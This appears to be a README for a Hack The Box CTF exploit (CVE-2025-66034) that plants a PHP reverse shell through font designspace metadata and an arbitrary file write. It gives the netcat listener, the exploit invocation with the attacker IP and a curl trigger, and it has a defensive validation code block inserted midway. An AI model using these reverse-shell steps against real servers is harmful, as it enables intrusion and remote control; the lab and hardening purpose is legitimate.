## https://sploitus.com/exploit?id=BD95669A-AA70-5E5C-9FCD-6435DA06BC74
# CVE-2025-66034-htb-ctf

# VariaType Variable Font Generator Exploit

This repository contains a specialized exploit for the **VariaType** machine on Hack The Box. The exploit leverages a vulnerability in how the `fontTools` library or the web application handles `.designspace` XML files and metadata interpolation to achieve **Remote Code Execution (RCE)**.

## ๐Ÿ“ Description

The vulnerability exists in the font generation process. By crafting a malicious `designspace` file, we can inject a PHP reverse shell payload into the font's metadata (specifically the `` field). When the server processes these files to generate a variable font, it writes the output to a user-defined path, allowing us to drop a `.php` shell in the webroot.
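The two weaknesses described above (a user-controlled output path that accepts a `.php` name, and CDATA-wrapped PHP inside designspace metadata) are what a server-side fix has to close. The following is an added hardening example, not code from the challenge or this repository: it confines the output name to a fixed directory with a font extension and rejects any designspace text or attribute carrying a PHP open tag. The base directory and the sample XML documents are constructed for the demonstration.

```python
import os
import re
import xml.etree.ElementTree as ET
ALLOWED_EXT = {".ttf", ".otf"}          # only genuine font output may be written
PHP_OPEN_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)

def safe_output_path(base_dir: str, requested_name: str) -> str:
    """Confine a user-supplied output name to base_dir with a font extension.
    Raises ValueError on traversal or a non-font extension such as .php."""
    base = os.path.realpath(base_dir)
    name = os.path.basename(requested_name)        # drop any directory part
    if name in ("", ".", ".."):
        raise ValueError("empty or invalid file name")
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
        raise ValueError("disallowed extension")
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes output directory")
    return target

def designspace_has_code_payload(xml_bytes: bytes) -> bool:
    """True if any text node or attribute carries a PHP open tag.
    The parser unwraps CDATA, so a CDATA-wrapped payload is plain text here."""
    root = ET.fromstring(xml_bytes)
    for elem in root.iter():
        for value in (elem.text, elem.tail, *elem.attrib.values()):
            if value and PHP_OPEN_TAG.search(value):
                return True
    return False

def validate_request(xml_bytes: bytes, base_dir: str, requested_name: str):
    """Run both checks; return (accepted, reason_or_resolved_path)."""
    try:
        target = safe_output_path(base_dir, requested_name)
    except ValueError as exc:
        return False, str(exc)
    if designspace_has_code_payload(xml_bytes):
        return False, "code payload in designspace metadata"
    return True, target

# Constructed sample documents for demonstration (not taken from the challenge).
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<designspace format="4.1">
  <axes><axis tag="wght" name="Weight" minimum="300" maximum="400" default="400"/></axes>
  <instances><instance name="Regular" familyname="Source"/></instances>
</designspace>"""
MALICIOUS = BENIGN.replace(
    b'<instance name="Regular" familyname="Source"/>',
    b'<instance name="Regular" familyname="Source"><familyname xml:lang="en">'
    b'<![CDATA[<?php echo "constructed marker"; ?>]]></familyname></instance>')
```

Because the check runs on the parsed tree rather than the raw bytes, CDATA wrapping or entity encoding of the payload does not bypass it.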

## ๐Ÿ› ๏ธ Features

* **Automated Font Generation**: Creates valid `source-light.ttf` and `source-regular.ttf` master fonts using `fontTools`.
* **XML Injection**: Generates a malicious `designspace` file with a CDATA-wrapped PHP payload.
* **Path Traversal/Arbitrary File Write**: Attempts to save the resulting "font" as a `.php` file in the public directory.
* **Randomization**: Generates unique shell names to avoid conflicts.

## 🚀 Requirements

You must have Python 3 installed along with the following libraries:

```bash
pip install fontTools requests
```

## 💻 Usage

### 1. Start your listener
On your local machine (or Pwnbox), start a Netcat listener:
```bash
nc -lvnp 4444
```

### 2. Run the exploit
Execute the script by providing your HTB VPN IP and the listener port:

```bash
python3 exploit.py --ip  --port 4444
```

### 3. Trigger the shell
If the upload returns a `200 OK` (or sometimes even a `500` if the processing happens before the error), the script will provide the filename. Access it via `curl` or your browser:

```bash
curl http://portal.variatype.htb/shell_xxxxxx.php
```

## โš™๏ธ Arguments

| Argument | Description | Default |
| :--- | :--- | :--- |
| `--ip` | Your listener IP (VPN) | **Required** |
| `--port` | Your listener port | **Required** |
| `--path` | Target path for the shell | `/var/www/portal.variatype.htb/public` |
| `--url` | The upload endpoint | `http://variatype.htb/tools/.../process` |

## โš ๏ธ Disclaimer

This script is intended for educational purposes and authorized penetration testing only. Accessing or attacking targets without prior authorization is illegal.
